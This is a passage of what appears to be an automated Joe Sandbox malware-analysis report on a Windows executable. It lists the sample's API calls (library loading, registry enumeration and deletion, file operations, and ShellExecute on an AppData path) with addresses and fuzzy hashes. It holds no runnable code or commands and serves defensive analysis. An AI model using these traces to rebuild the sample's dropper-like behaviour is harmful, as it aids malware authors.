                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer$CountTick
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1092082344-0
                                                                                                                    • Opcode ID: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                    • Instruction ID: 2f989109dca0f14896005150ea4b142ee5491df85de4bcb3d025a191183ef828
                                                                                                                    • Opcode Fuzzy Hash: 1d6b410ec908590b26d0e6386832776f3ccc0075e6ffb3c2499094a24fe2f275
                                                                                                                    • Instruction Fuzzy Hash: 6F317A72500215DFCB109F69EEC496A3BAAF74475A714423FE900B22E0CB799D05DB9D
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                                      • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                                      • Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
                                                                                                                      • Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                                      • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                                    • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 334405425-0
                                                                                                                    • Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                    • Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
                                                                                                                    • Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
                                                                                                                    • Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(?,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50, 4ou.ou,?,756F2EE0,00405994,?,756F3420,756F2EE0), ref: 004064D1
                                                                                                                      • Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD
                                                                                                                    • lstrlenW.KERNEL32 ref: 0040222A
                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 00402235
                                                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1486964399-0
                                                                                                                    • Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                    • Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
                                                                                                                    • Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
                                                                                                                    • Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Enum$CloseOpenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 167947723-0
                                                                                                                    • Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                    • Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
                                                                                                                    • Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
                                                                                                                    • Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                    APIs
                                                                                                                    • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched,?), ref: 00401E52
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401E3B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteShell
                                                                                                                    • String ID: C:\Users\user\AppData\Local\magmaet\clenched
                                                                                                                    • API String ID: 587946157-536943358
                                                                                                                    • Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                    • Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
                                                                                                                    • Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
                                                                                                                    • Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618
                                                                                                                    APIs
                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FilePointer
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 973152223-0
                                                                                                                    • Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                    • Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
                                                                                                                    • Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
                                                                                                                    • Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3677997916-0
                                                                                                                    • Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                    • Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
                                                                                                                    • Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
                                                                                                                    • Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19
                                                                                                                    APIs
                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3850602802-0
                                                                                                                    • Opcode ID: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                    • Instruction ID: 26eaddb35cdc13faf07641838d00295e4864c68e45bdd86d166378f51b3c2f7b
                                                                                                                    • Opcode Fuzzy Hash: f9407d004fa553bc8aea849b77edd3aa449c930f6ff429ba1ebd3d51c967f122
                                                                                                                    • Instruction Fuzzy Hash: 3201F431724210EBE7295B389D04B6A3698E710714F10897FF855F62F1D678CC028B5D
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseDeleteOpenValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 849931509-0
                                                                                                                    • Opcode ID: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                    • Instruction ID: 60bb5986470d48ad8cc55f7ac878df2b05d68ac6ea48f0c646ace7267bb4d846
                                                                                                                    • Opcode Fuzzy Hash: e10cef08bc8bbd86e44cd2e6a93393b87c6fb5f379b9916ae68ae103a788fbbd
                                                                                                                    • Instruction Fuzzy Hash: 88F04F32A04110ABEB11BFB59B4EABE72699B40314F15807BF501B71D5D9FC9902962D
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,00403422,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040656B
                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00406586
                                                                                                                      • Part of subcall function 004064ED: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406504
                                                                                                                      • Part of subcall function 004064ED: wsprintfW.USER32 ref: 0040653F
                                                                                                                      • Part of subcall function 004064ED: LoadLibraryW.KERNELBASE(?), ref: 0040654F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2547128583-0
                                                                                                                    • Opcode ID: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                    • Instruction ID: e4d993762fdbf4af8c35b1588ad4eaffa1172a51f023226dd59e00ceba6dfa89
                                                                                                                    • Opcode Fuzzy Hash: 8ec7921864f699fe8fbd142852d98d12a3a6d7db0e4c5c6745342fffa33e782c
                                                                                                                    • Instruction Fuzzy Hash: 12E086335042106BD2105B70AF4487773B89E94704306083EF546F2044D778DC329A6D
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
                                                                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00401DFD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1357241082.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1357219524.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357259723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357335472.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1357540340.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_RmIYOfX0yO.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$EnableShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1136574915-0
                                                                                                                    • Opcode ID: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                    • Instruction ID: 2c738a9deecb2df013c07ba3b1cf6af0bd96662f3609e31d22ea84ca5a045a2b
                                                                                                                    • Opcode Fuzzy Hash: 075d78e16e831d865290747b9eef420f676278b691cb94837bc861c0c9eb665c
                                                                                                                    • Instruction Fuzzy Hash: 4FE08C326005009BCB20AFB5AB4999D3375DF50369710007BE442F10E1CABC9C408A2D
                                                                                                                    APIs
                                                                                                                    • GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\RmIYOfX0yO.exe,80000000,00000003), ref: 00405D5C
                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D7E
                                                                                                                    Memory Dump Source
